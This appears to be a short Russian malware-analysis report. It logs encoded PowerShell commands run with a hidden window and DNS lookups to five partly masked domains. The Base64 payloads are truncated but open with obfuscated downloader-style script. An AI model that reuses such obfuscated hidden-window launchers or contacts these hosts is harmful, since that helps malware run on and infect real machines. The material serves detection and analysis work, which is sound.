Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHcAeAB0AHoAYwBiAHUAcQB1AGEAPQAnAFQAbABoAG8AcABmAGMAZQBkAGIAZQB3ACcAOwAkAFAAawBkAGIAcQBxAGYAZgBjAG...
- DNS ASK va######denvoitoinhahi.com
- DNS ASK bi###arati.com
- DNS ASK te####-survey.com
- DNS ASK si###bazaar.com
- DNS ASK z3###design.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHcAeAB0AHoAYwBiAHUAcQB1AGEAPQAnAFQAbABoAG8AcABmAGMAZQBkAGIAZQB3ACcAOwAkAFAAawBkAGIAcQBxAGYAZgBjAG...' (со скрытым окном)